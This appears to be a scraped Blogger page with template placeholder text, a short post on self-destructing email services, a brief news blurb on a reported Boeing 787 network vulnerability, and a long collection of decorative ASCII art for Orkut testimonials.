This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

How to Send Self-Destructing Emails

Ever sent an email you later regretted writing? We all have, but it can be especially bad when those emails are sent to the wrong person or get leaked on the Internet. You might not know this, but there are many providers that offer self destructing email services. These services give you complete control over who reads them, how long they exist, or whether they can be printed, copied, or forwarded. Hey, you don't have to be a secret agent to send self-destructing emails, just a very smart geek with a reputation to maintain, so check out what these sites can do for you:

Will Self-Destruct:
This service is free. There's no sign up process, but you have to fill out a
web-based form with the recipient's email address, subject, and your message.
The recipient receives an email with a link to a web page containing your
message. Once the link is accessed, a countdown begins, and the message is
destroyed. The email itself looks like spam, so make sure you tell your friend
to expect something from willselfdestruct.com.
SDMessage and
Destructing Message are two
similar alternatives.

KickNotes: Another web-based service
that sends self-destructing messages after filling out a form. You can actually
control the times the message can be viewed or how long you want the message to
exist. Once the message is created, you can either send a link to a web page
through your own email address or from KickNotes.



These sites can be useful if you want to send password or other important information that you don't want other people to see.

Boeing's New 787 May Be Vulnerable to Hacker Attack



Boeing's new 787 Dreamliner passenger jet may have a serious security vulnerability in its onboard computer networks that could allow passengers to access the plane's control systems,The computer network in the Dreamliner's passenger compartment, designed to give passengers in-flight internet access, is connected to everything the plane controls.



AddThis Social Bookmark Button

new cool ascii for orkut testimonals

[b][red]$$$$$$___$$$$___$$$$$___$$$$$$_$$$_$$$_$$$$$$_$$$$$____
_$___$__$____$___$___$___$___$__$___$___$___$__$___$___
_$_____$______$__$___$___$______$___$___$______$___$___
_$__$__$______$__$___$___$__$___$___$___$__$___$___$___
_$$$$__$______$__$$$$____$$$$____$_$____$$$$___$$$$____
_$__$__$______$__$__$____$__$____$_$____$__$___$__$____
_$_____$______$__$__$____$_______$_$____$______$__$____
_$______$____$___$___$___$____$___$_____$____$_$___$___
$$$______$$$$___$$$___$$$$$$$$____$____$$$$$$_$$$___$$_

$$$$$$_$$$$$$__$$$_$$$$$$_$$___$$$_$$$$$$____$$$_$__
_$___$__$____$__$___$___$__$____$___$____$__$___$$__
_$______$____$__$___$______$$___$___$_____$_$____$__
_$__$___$____$__$___$__$___$_$__$___$_____$__$$_____
_$$$$___$$$$$___$___$$$$___$__$_$___$_____$____$$___
_$__$___$__$____$___$__$___$__$_$___$_____$______$__
_$______$___$___$___$______$___$$___$_____$_$____$__
_$______$___$___$___$____$_$____$___$____$__$$___$__
$$$____$$$___$$$$$_$$$$$$_$$$___$__$$$$$$___$_$$$___





[b][green]??7´´´´¶¶¶¶¶$1´´´´¶¶¶¶¶¶7´´o¶¶oo´¶oo¶7
´¶11¢$?o17¶´¶¶¶?¶¶?¶$¢1?$?¢¶¶¶¶¶´7´¶¶´11¢1¢$
´$77?´´¶´´¶´7¢?7´´o¶1¶´1oo1o´´¶¶¶´´¶¶´?¢o1¶
´?oo¢´´¶´´¶´7o?¢´´?¶´¶´´?77¢´´´´´´´¶¶´$77?¶
´?¢¢71´?´´¶´1¢?o1´??´¶´´¶71?´´´´´´´$¶¢77o¶
´¢??¢¢o77¶¶´´¢?o1´$¢1¶´´¶o1?´´´´´´´?¢o77´7
´¢??7o?1¶7´´´¢?o1´$o1¶´´¶¢1?´´´´´´´$?o77oo
´¢?¢77¶o1´´´1¢$o´´$o´$´´??´?´´´´´´´$?´¶17?7
´??¢o´?¶´o´´o$$7´´?o1o´´?$´7´´71´´´??´¢¢o7o
´$o¢?´´¶¶7´´$¶¶¢77¢oo?´¢¶¶¢?7$¶¶o1´??11´¢oo1
´¶?$¶´´´?¶o´´7¶¶¶$?¶¶¶´´7¶¶¶¶¶¶¶¶´7¶¶oo´¶??¶
´ooo?´´´´7¶o´´´ooooo´´´´´´7117o´´´´oo¢1´´¢¢



¦¦¦
10%

¦¦¦¦¦¦¦¦¦¦¦¦¦¦
45%

¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
89%

¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
100%

* -:- *W* -:- *
* -:- *E* -:- *
* -:- *L* -:- *
* -:- *C* -:- *
* -:- *O* -:- *
* -:- *M* -:- *
* -:- *E* -:- *
* -:- * * -:- *

* -:- * * -:- *
* -:- *T* -:- *
* -:- *O* -:- *
* -:- * * -:- *

* -:- *M* -:- *
* -:- *Y* -:- *
* -:- * * -:- *

* -:- *P* -:- *
* -:- *R* -:- *
* -:- *O* -:- *
* -:- *F* -:- *
* -:- *I* -:- *
* -:- *L* -:- *
* -:- *E* -:- *
* -:- * * -:- *





I am 2

sweet




[b][red]____________000000____________000000
__________000000000000______00000000000
______000000000000000000__0000000000000000
____00000000000000000000000000000000000000
___00000000000000___000000000___000000000000
__000000000000000___000000000___00000000000000
_0000000000000000___000000000___000000000000000
_0000000000000000___000000000___000000000000000
_0000000000000000___000000000___000000000000000
_0000000000000000___000000000___000000000000000
_0000000000___000000000000000000000___0000000000
__000000000___000000000000000000000___000000000
___000000000___0000000000000000000___000000000
_____000000000___000000000000000___000000000
_______00000000____00000000000____00000000
__________0000000_______________0000000
_____________0000000000000000000000000
_______________000000000000000000000
__________________000000000000000
___________________00000000000
______________________00000
________________________0



.
[b][pink]_________8"=,,88,
_____8""=""8'__"88a88'
.._.;88m a8___,8""_"8
__"8"'__"88"__A"_____8;
___"8,__"8___8_______"8,
____"8___8,__8,_______"8
_____8,__"8,_"8,_______8,
_____"8,__"8,_"8mm""""""8m.
______"8,am888i"'___ 3,mm"
______,8"___8"__ 3.m888"
_____,88P""""" 3I888888
________________"I888_
__________________"I8,
___________________"I8
____________________"I8_
________,mmeem.m""i,_I8""__,mmeem,'.
_______m""____._"8.8_I8__,8"___.__"88
______i8__._'__,mi""8I8_,8_._'__,8"_88
______88.'_,mm""____"8I88"m,,mm'" 8
______"8_m""_________"I8 ""'
_______"8_____________I8
______________________I8
______________________I8""
______________________I8
______________________I8
____________________""I8
______________________

[b][maroon]´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´ o´¶¶¶```
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´Ã¸7¶Ã¸1¢```
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶´Ã¸1o1```
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´.o¶¶7¶1```
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´oo¶Ã¸```
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¢¶¶¶```
´´´´´´´´´´´´´´´´´´´´´´´´´´´´o¶¶¶```
´´´´´´´´´´´´´´´´´´´´´´´´´´$¶¶Ã¸```
´´´´´´´´´´´´´´´´´´´´´´´´´¶¶¶o```
´´´´´´´´´´´´´´1ø$7´´´´´¢¶¶¶1```
´´´´´´´´´´´´´Ã¸¶¶Ã¸7¢$ø7ø¶¶¶$```
´´´´´´´´´´´¶¶´´´11´´1¶Ã¸¶o```
´´´´´´´´´´´¶´1771´´¢¶Ã¸Ã¸$````
´´´´´´´´´´¶Ã¸´71177øø$$ø17o```
´´´´´´Ã¸¶¶¶Ã¸´177¢¶¶$øø7´17¢7````
´´´¶¶¶Ã¸1´´171¢Ã¸¶Ã¸1o¶$´177¢7`````
´¶¶Ã¸1´1777771o7ø¶¶¶¢o17o¢¢`````
¶¶1177777777717ooooo7oø¢1`````
$17oo7oo11777o771177¢7``````
o7o7oo$¶¶Ã¸77o7ooooooø``````
ooooo77177o¢7177ooooø``````
1¶¢ooooo7o¢o¢¶Ã¸o7ooøo`````
´o¶Ã¸¢oooooo7oø¶¢7o¢$1`````
´´´¢¶$¢¢oooooo7oo¢$o``````
´´´´´o¶¶¶Ã¸Ã¸¢oooø$¶7``````
``````````````````````
````````````````````
`````````````````

[b][black]----------. ;; .
---------/ ;;;; \ ____----- .;;.
--------|;(;;;-""-------`'-.,';;;;;\
---------\;'-------------------';;);/
--------/------------------------\;'
-------/------.;.-------.;.--------\
------|------;;o;;----;;o;;------|
------ ;----- '"-'`----`'-"'----- /
------/\-----------._. ---------/
-----;;;;;;_-----,_Y_,---- _.'
----/;;;;;;;\-`---.___.--- ';.
---/|;;;;;;;;;.__.;;;.-------\\
--; -\ ;;;;;;;;;;;;;;;;;;\------;\__--.;.
--|-----';;;;;;;;;;=;;;;'-------|-__;;;;/
--|-------`""`- .------._-----/;/;;\;;/
-/ ;------------/;;;;;;;-;/;;;;;;;/--|;/
-\_,\----------|;;;;;;;;;;;;;;;;;;|-|
------'-...----- ';;;;;;;;;;;;;;;;;;\/



[b][red]: ¸.•´¸.•*´¨) ¸.•*¨)
(¸.•´ (¸.•` * ¸.•´¸
... , . - . - , _ , TO
... ) ` - . .> ' `( ..
.. / . . . .`\ . . \ . you
.. |. . . . . |. . .|
... \ . . . ./ . ./ ..
..... `=(\ /.=` ......MAY
....... `-;`.-' ..
......... `)| ... , ..
.......... || _.-'| ..U
...... ,_|| \_,/ .....
.. , ..... \|| .' .HAVE
. |\ |\ ,. ||/ ......
..\` | /|.,|Y\, ..... MANY
'-...'-._..\||/ .....
... >_.-`Y| .........
........ ,_|| .......MORE
.......... \|| ......
........... || ......WITH GOOD
........... || ......
........... |/ ......
.¸.•*¨)¸.•*¨)HEALTH.
(¸.•´...¸.•´¸.•*´¨) ¸.•*¨)
(¸.•´ (¸.•` * ¸.•´¸.•*´¨)

┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼██┼┼█████┼┼
┼┼┼██┼┼██┼██┼┼
┼┼┼██┼┼█████┼┼
┼┼┼██┼┼┼┼┼██┼┼
┼┼┼██████┼██┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼


███ ███ ███ ♥♥♥♥♥♥ ███ ███ ███
W ♣ E ♣ L ♣ C ♣ O ♣ M ♣ E
███ ███ ███ ♥♥♥♥♥♥ ███ ███ ███





[b][blue]
´´´´´´´´´´´´´´´´´Ã¸$´´´´´´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´¶¶¶´´´´´o¶¶¶¶¶7´´´´´´´´´
´´´´´´´´´´´´´´´1¶¶¶Ã¸´´´´´´¶¶¶¶7´´´´´´´´´
´´´´´´´´´´´´´´´´´´¶¶¶¶7o´$¶¶¶¶´´´´´´´´´´
´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶´1¶¶¶¶¶´´´´´´´´
´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶¶¶¶Ã¸´´´´´´´
´´´´´´´´´´´´´´´´´´´´´Ã¸¶¶¶¶¶¶¶¶¶¶$´´´´´´´
´´´´´´´´´´´´´´´´´´7¶¶¶¶¶¶¶¶¶¶¶¶¶o´´´´´´´
´´´´´´´´´´´´´´´´¶¶¶´´´´´´´¶¶¶¶¶¶7´´´´´´´
´´´´´o¶¶¶¶¶¶7´´¶¶¶´´´´´´´´´¢$$´´´´´´´´´´
´´´´´´´´´´´1¶¶¶¶¶¶¶¶¶7´´´´´´´´´´´´´´´´´´
´´´´´´´´´´´´¶¶¶¶¶¶¶¶¶¶¶o´´´´´´´´´´´´´´´´
´´´¶¶¶¶¶¶´¶¶¶´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶$$¶$¶Ã¸´´´
´¶¶¶´´´´´¶¶´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶$¶¶¶¶
7¶´´´´´´¶¶¶¶´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶´´´´´´
¶¶´´¶¶¶¶Ã¸´´¶´´´´´¶¶¶¶¶¶¶¶7´1o¶¶o´´´´´´´´
¶¶´´1¶¶¶´´´¶´´´´´¶¶¶¶¶¶¶¶1´´´´1¶¶¶Ã¸´´´´´
´¶¶´´´´´´´¶¶´´´´´´´$¶¶¶¶¶¶¶¶¶¶¶1´´¶¶¶´´´
´7¶¶¶oø¶¶¶¶´´´´´´´´´´´´1øøø¶¶¶¶¶¶$´´¶¶´´
´´´´Ã¸¶¶¶7´´´´´´´´´´´´´´´´´¶¶´¶¶¶¶¶¶´¶¶´´
´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶´´´¶¶¶´´¶¶´´
´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶o´´´´´¶¶´´´
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶o´´




[b][olive]~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~$$$$~~~
~~~~~~~~~~~~$$$$$$~~~
~~~~~~~~~~~.$$$**$$~~~
~~~~~~~~~~~$$$"~~'$$~~~
~~~~~~~~~~$$$"~~~~$$~~~
~~~~~~~~~~$$$~~~~.$$~~~
~~~~~~~~~~$$~~~~..$$~~~
~~~~~~~~~~$$~~~~.$$$~~~
~~~~~~~~~~$$~~~$$$$~~~~
~~~~~~~~~~~$$$$$$$$~~~~
~~~~~~~~~~~$$$$$$$~~~~
~~~~~~~~~.$$$$$$*~~~~
~~~~~~~~$$$$$$$"~~~
~~~~~~.$$$$$$$~~~
~~~~~$$$$$$"`$~~~~~
~~~~$$$$$*~~~$$~~~~~
~~~$$$$$~~~~~$$.$..~~~
~~$$$$$~~~~$$$$$$$$$$.~~
~~$$$$~~~.$$$$$$$$$$$$$~
~~$$$~~~~$$$*~'$~~$*$$$$
~~$$$~~~'$$"~~~$$~~~$$$$
~~3$$~~~~$$~~~~$$~~~~$$$
~~~$$$~~~$$$~~~'$~~~~$$$
~~~'*$$~~~~$$$~~$$~~:$$~
~~~~~$$$$~~~~~~~$$~$$"~
~~~~~~~$$*$$$$$$$$$"~~~
~~~~~~~~~~~~````~$$~~~
~~~~~~~~~~~~~~~~~'$~~~
~~~~~~~~~~..~~~~~~$$~~~
~~~~~~~~$$$$$$~~~~$$~~~
~~~~~~~$$$$$$$$~~~$$~~~
~~~~~~~$$$$$$$$~~~$$~~~
~~~~~~~~$$$$$"~~.$$~~~
~~~~~~~~~"*$$$$$*"~~~

      █████
     ██▒▒▒██
    █▒▒▒▒▒▒██
    █▒▒▒▒▒▒▒██
   ██▒▒▒▓▓▓▒▒██  █
   █▒▒▒▓▓▓▓▒▒▒█   █
  ██▒▒▒▓▓▓▓▓▒▒█   █
  █▒▒▒▓▓▓▓▓▓▒▒█   █
  █▒▒▒▓▓▓▓▓▓▒▒█ ████████
  ██▒▒▓▓▓▓▓▓▒▒█ █████  █
   █▒▒▒▓▓▓▓▒▒▒██████
   ██▒▒▒▓▓▒▒▒█████████████████
  ████▒▒▒▒▒▒██████▒▒▒▒▒▒▒▒▒▒▒▒███
 ██▒▒██▒▒▒▒██████▒▒▒▓▓▓▓▓▓▒▒▒▒▒██
██▒▒▒▒██▒▒██████▒▒▒▓▓▓▓▓▓▓▓▒▒▒▒██
█▒▒▒▒▒▒████████▒▒▒▓▓▓▓▓▓▓▓▓▒▒▒▒█
█▒▒▒▒▒▒▒▒█████▒▒▒▓▓▓▓▓▓▓▓▓▒▒▒▒██
██▒▒▒▒▒▒█████▒▒▒▒▓▓▓▓▓▓▓▓▒▒▒███
 ██▒▒▒▒▒███▒██▒▒▒▒▓▓▓▓▓▒▒▒▒██
  ███████▒▒▒▒██▒▒▒▒▒▒▒▒▒████
      █▒▒▒▒▒▒▒██████████
      ██▒▒▒▒▒▒▒██
       ██▒▒▒▒▒▒██
        ██▒▒▒▒██
         ██████


we r ________________##_________##
_______________###*_______*###
___________.*#####_________#####*.
__________*######__________######*
________*#######____________#######*
_______*########.__________.########*
______*#########.__________.#########*
______*######@###*_______*###@######*
_____*#########*###____###*#########*
____*##########*__*####*__*##########*
__*###########_____*_*______###########*
_############_______________############
*##*#########____FRIENDS ____#########*##*
*_____########______________########_____*
_______#######______________#######
________*######____________######*
_________*#####*__________*#####*
___________*####*________*####*
_____________*####______####*
_______________*##*____*##*
_________________*##__# #*
__________________*####*
_________________.######.
_______________.#########*
____ _________.###########*
_____________.####*__*######


_______####___####___####_SSS'_____########
_______####___####___####_'SSSSSs,____####
____,__####___####___####____""SSSs___####
__,#######"___"#########"__SsssSSSs___####
___"#####'_____"#######"__'SSSSSS"_____####

_####,____,####'
__"###,__,####'
___"####.####'_____,,,,,,,,,,,
____"######"____,########,,___####____,####
______####_____#####""####,__####____####
______####____,####____####_,####____####
______####____,###,____####__,####___####
______####_____'####,,####'____'####,,####
______####_______"######"______"######"

____ xxxxxxxx________xxxxxxxx T
____xxxxxxxxxx______xxxxxxxxxxx H
___xxxxxxxxxxxxx___xxxxxxxxxxxxx A
___xxxxxxxxxxxxxx_xxxxxxxxxxxxxx N
___xxxxxxxxxxxxxxxxxxxxxxxxxxxxx K
____xxxxxxxxxxxxxxxxxxxxxxxxxxxx S
_____xxxxxxxxxxxxxxxxxxxxxxxxxx
______xxxxxxxxxxxxxxxxxxxxxxx
_________xxxxxxxxxxxxxxxxxx F
___________xxxxxxxxxxxxx O
_____________xxxxxxxxx R
______________xxxxxx
_______________xxxx
_______________xxx B
______________xx E
_____________x I
___________x N
________xx G
______xxx
_____xxxx
___xxxxxx M
___xxxxxxx Y
____xxxxxxxx
______xxxxxxxx
________xxxxxxx F
_________xxxxxx R
_________xxxxxx I
________xxxxx E
_____xxxxxx N
____xxxx D
@@@______@@
@@@@_____@@
@@_@@____@@
@@__@@___@@
@@___@@__@@
@@____@@_@@
@@_____@@@@
@@______@@@

@@@@@@@@
___@@
___@@
___@@
___@@
___@@
@@@@@@@@

_____@@@@@@@@
___@@@@@@
_@@@@@@
@@@@@@
_@@@@@@
___@@@@@@
_____@@@@@@@@

@@@@@@@
@@
@@
@@@@@@@
@@
@@
@@@@@@@

______@@@@@@
___@@@@@
_@@@@
@@@@
_@@@@
___@@@@@
______@@@@@@

___@@@@@@@@@
_@@@_______@@@
@@@_________@@@
@@@_________@@@
@@@_________@@@
_@@@_______@@@
___@@@@@@@@@

___@@@@@@@@@
_@@@_______@@@
@@@_________@@@
@@@_________@@@
@@@_________@@@
_@@@_______@@@
___@@@@@@@@@

@@
@@
@@
@@
@@
@@@@@@@

¶¶¶¶¶¶
¶¶
¶¶¶¶¶
¶¶¶¶¶ aithful…
¶¶
¶¶

¶¶¶¶¶¶
¶¶___¶¶
¶¶___¶¶
¶¶¶¶¶¶
¶¶¶¶¶ espectful…
¶¶__¶¶
¶¶___¶¶

¶¶
¶¶
¶¶
¶¶ ntelligent…
¶¶
¶¶

¶¶¶¶¶¶
¶¶
¶¶¶¶¶ verlasting or loyal…
¶¶
¶¶¶¶¶¶

¶¶__¶¶
¶¶¶_¶¶
¶¶¶¶¶¶
¶¶¶¶¶¶ aughty…and
¶¶_¶¶¶
¶¶__¶¶

¶¶¶¶¶
¶¶¶¶¶¶
¶¶__¶¶¶
¶¶___¶¶earest of all…
¶¶__¶¶¶
¶¶¶¶¶¶
¶¶¶¶¶

█████████████████████████████████████
₪┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼₪
₪┼██┼┼┼┼██┼████┼┼┼███┼┼┼████┼██┼┼█┼┼₪
₪┼██┼┼┼┼██┼█┼┼┼█┼█┼┼┼█┼█┼┼┼┼┼██┼█┼┼┼₪
₪┼██┼┼┼┼██┼█████┼█┼┼┼█┼█┼┼┼┼┼███┼┼┼┼₪
₪┼██┼┼┼┼██┼█┼█┼┼┼█┼┼┼█┼█┼┼┼┼┼██┼█┼┼┼₪
₪┼██┼┼┼┼██┼█┼┼█┼┼█┼┼┼█┼█┼┼┼┼┼██┼┼█┼┼₪
₪┼┼██████┼┼█┼┼┼█┼┼███┼┼┼████┼██┼┼┼█┼₪
₪┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼₪
█████████████████████████████████████
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$'`$$$$$$$$$%`_$$$$$$$$$$$$$
$$$$$$$$$$__$$$$$$$$%__$$$$$$$$$$$$$$$
$$$$$$$$$$$__'$/_/_`$'_$$$$$$$$$$$$$
$$$$$$$$$$$$._i__i__/!_;$$$$$$$$$$$$
$$$$$$$$$$$$$.--'--'___$$$$$$$$$$$$$
$$$$$$^^$$$$$'_______J$$$$$$$$$$$$$$$
$$$$$$$___~""___`.___.$$$$$$$$$$$$$$$
$$$$$$$$$e,______;__.$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$.'___$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$.____$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$_____$$$$$$$$$$$$$$$


LANGUAGE OF FRIENDSHIP ♥
          ♥     ♥ A Always Funny

    ♥    ♥ B Beautiful Personality
C Common Interests
  D Delightfully Entertaining    
   .((`'-"`""-'''))E Exciting Person
   -)      (F Fashionable
   / -'(o _ o) \G Good Taste
   \  -( 0 )  /  “H Happy Times Together
  __'-....._'='_...-'__ I Intelligent Person
 -/`;♥'♥'♥ ♥'♥'♥;`\J Jolly Laughter
 -\_))  ''♥''  ((_/K Kind
  ♥.       -.♥L Listens Well
  -'♥.   ♥  -.♥' M Makes Jokes
  -/-'♥.    ♥'-\N Never Mean or Cruel
  _\__\'♥. .♥'/_/_O Original
 -(((___)_'♥'_(___)))♥ P People Person
Q Quality Time ♥
R Real Person
*´¨) S Secret Keeper
¸.•´¸.•*´¨) ¸.•*¨) T Terrific Sense of Humor
(¸.•´ (¸.•` *U Understanding ♥!
♥♥♥ V Very Special
♥♥♥ W Works Hard ♥♥♥
♥♥♥ X Xciting Person ♥♥♥
♥♥♥ Y You Are The Best ♥♥♥

__♥♥_♥♥
_♥♥___♥♥
_♥♥___♥♥_________♥♥♥♥
_♥♥___♥♥_______♥♥___♥♥♥♥
_♥♥__♥♥_______♥___♥♥___♥♥
__♥♥__♥______♥__♥♥__♥♥♥__♥♥
___♥♥__♥____♥__♥♥_____♥♥__♥
____♥♥_♥♥__♥♥_♥♥________♥♥
____♥♥___♥♥__♥♥
___♥___________♥
__♥_____________♥
_♥____♥_____♥____♥
_♥____/___@\_____♥
_♥_____/____/____♥
___♥_____W_____♥
_____♥♥_____♥♥
_______♥♥♥♥♥


.......,-.______________,=========,
......[|..)_____________)#######((_
....../===============..-..___,--".._\
....."-._,__,____["RelOading]_\.####/
......................\...(...).)...).####O##(
........................\..\____/,..#######\
.........................`===="....\#######\
...........................................\#######\
.............................................)##O####|
.............................................)..####__,"
..............................................`..--."."

₪┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼₪
₪┼┼████┼███┼█┼┼█┼█┼┼█┼█████┼┼₪
₪┼┼█┼┼█┼█┼█┼█┼█┼┼█┼┼█┼┼┼█┼┼┼┼₪
₪┼┼█┼┼█┼█┼█┼██┼┼┼█┼┼█┼┼┼█┼┼┼┼₪
₪┼┼█┼┼█┼█┼┼┼█┼█┼┼█┼┼█┼┼┼█┼┼┼┼₪
₪┼┼████┼█┼┼┼█┼┼█┼████┼┼┼█┼┼┼┼₪
₪┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼₪



₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω
○┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼○
●┼██┼┼┼██┼┼█┼┼┼█┼┼█████┼┼█┼┼█┼┼█┼┼┼●
○┼█┼█┼█┼█┼┼█┼┼┼█┼┼██┼┼┼┼┼┼┼┼█┼█┼┼┼┼○
●┼█┼┼█┼┼█┼┼█┼┼┼█┼┼█████┼┼█┼┼██┼┼┼┼┼●
○┼█┼┼┼┼┼█┼┼█┼┼┼█┼┼┼┼┼██┼┼█┼┼█┼█┼┼┼┼○
●┼█┼┼┼┼┼█┼┼█████┼┼█████┼┼█┼┼█┼┼█┼┼┼●
○┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼○
₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω₪₪Ω₪Ω


...........|/|/|/|/|/
..........(^O.O^)
..........(...(_)...)
............\..--../_----->
........./¯¯Y¯¯\.\
.........|....|.......\..\
.........|._.\_.....|\_.\
..........\__\......|...\..\
......(¯¯¯\...\_|/¯¯\__\_________oooooo
........)===ºººº====0000=========)
......(____/¯¯¯\__/
........./..../.........\...\
..__./._/.............\._.\__
(____ /.............(_____)


`````````````)||(
´´´´´´´´´´´´\´=´/
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´´´´|!!|
´´´´´´´´´´)~~)||(~~(
´´´´´´´¨´/´´´´||||´´´\
´´´´´´´´)´´´´´||||´´´´(
´´´´´´´(/´´´´´||||´´´´\)
´´´´´´´´/´´/´´)´´(´´\´´\
´´´´´´´´\´´´´((!!))´´´´/
´´´´´´´´´\´´((*()*))´´/
´´´´´´´´´)´´´´(!!)´``(
´´´´´´´´´/´´´´´´~´```\
´´´´´´´´/´´´´||||||´```\
´´´´´´´/´´´´´||||||´´´´´\
´´´´´´(\(´´´´´´´´´´´´´´)/)
´´´´´´´\(´´´======´´´)/

´´´´´´´´´´´´´´´´´´´´o¶$$$$$$$$$$$$$$$$$$$$¶Ã¸
´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶¶¶¶¶$$$$¶¶¶¶¶¶¶¶¶¶
´´´´´´´´´1øø¶7´´´´´´7¶$$$$¶¶¶¶¶$$$¶¶¶¶¶¶¶¶¶¶
´´´´´1¶¶¶¶¶¶¶¶¶¶¶¢´´´¶¶$$$$¶¶$$¶¶$$¶¶¶¶¶¶¶¶¶
´´´´¶¶¶¶¶$¶¶¶¶¶¶¶¶1´´¶¶¶$$$$$$$$$$$$¶¶¶¶¶¶$¶
´´¶¶¶¶$$$$$$$$øø¶¶¶¶´´´¶¶$$$$$$$$$$$$$$$¶$¶¶
´¶¶¶¶¶$$$$$$¶$$$$$¶¶¶´´¶¶$$$$$$$$$$$$$$$$$$¶
1¶¶¶$$$¶¶¶¶¶¶¶$$$$¶¶¶$´¶¶¶¶$$$$$$$¶¶¶¶¶$$$$¶
¶¶¶¶$$$¶$$$$¶$$$¶¶¶¶¶¶¶¶¢¶¶¶¶$¶¶¶¶¶$øøøøøøøø
¶¶¶$$$$¶$$$$¶$$$$$$$$$$¶´´o¶¶¶¶¶¶¶Ã¸Ã¸$$$$$¶¶¶
¶¶¶¶$$$¶¶$¶¶¶¶$$$$$$$$¶¶¶´´´¶¶¶7´$$$¶$¶¶$$$¶
´¶¶¶$$$$$$¶$$¶$$$$$$$$$¶¶´´´´´´´¢¶¶$$$$$$$$¶
´¶¶¶¶¶$ø$$¶$$$$$$$$$$$$$¶¶´´oo´´¶¶$$$¶$$$$$$
´´¶¶¶¶¶$$$$$¶¶¶¶¶¶¶$$$¶¶¶¶¶´7´7¶¶$$$$$$$$$$$
´´´´¶¶Ã¸Ã¸Ã¸$øøø$¶¶$$$¶¶¶¶¶¶¢´´´¶¶¶¶$¶¶$$$$$$$$
´´´´Ã¸¶$$øø$$$øø¶¶$$$¶¶o´´´´´¶¶¶$$$$$$$$$$$$¶
´´´´´¶¶$$ø$ø$$ø$¶¶¶¶¶Ã¸´´´´¢¶¶¶$$$$$$$$$$$¶¶$
´´´´´o¶¶$ø$$$øøø$¶¶¶¶´´´Ã¸¶¶¶$$$$$$$$$$$$$¶$$
´´´´´´¶¶¶$$$$øø$ø¶¶¶¶´¶¶¶¶$ø$$$$$¶¶¶$$$$¶$$$


+++++++++++▄██▄
++▄██▄+++▄██████▄+++▄██▄
+██████+██████████+██████
+████████████████████████
+███████ KEEP SMILING ██████
++██████████████████████
+++████████████████████
+++++████████████████
+++++++████████████
++++++++++++██
++▄███▄+++++██+++++▄███▄
+███████++++██++++███████
++███████+++██+++███████
++++██████++██++██████
++++++█████+██+█████
++++++++██████████

_+++__________LIFE!!!_____________
_+88________ROCK_ON!!!____________
_+880_____________________________
_++88_____________________________
_++88_____________________________
__+880_________________________++_
__+888________________________+88_
__++880______________________+88__
__++888_____+++88__________+++8___
__++8888__+++8880++88____+++88____
__+++8888+++8880++8888__++888_____
___++888++8888+++888888++888______
___++88++8888++8888888++888_______
___++++++888888888888888888_______
____++++++88888888888888888_______
____++++++++000888888888888_______
_____+++++++000088888888888_______
______+++++++00088888888888_______
_______+++++++088888888888________
_______+++++++088888888888________
________+++++++8888888888_________
________+++++++0088888888_________
________++++++0088888888__________
________+++++0008888888___________
________############______________
________############___________

*********.--,_
********['****'\.
*********\*******`''|
*********|*********,]
**********`._******].
************|*****\
**********_/*******-'\
*********,'**********,'
*******_/'**********\*********************,....__
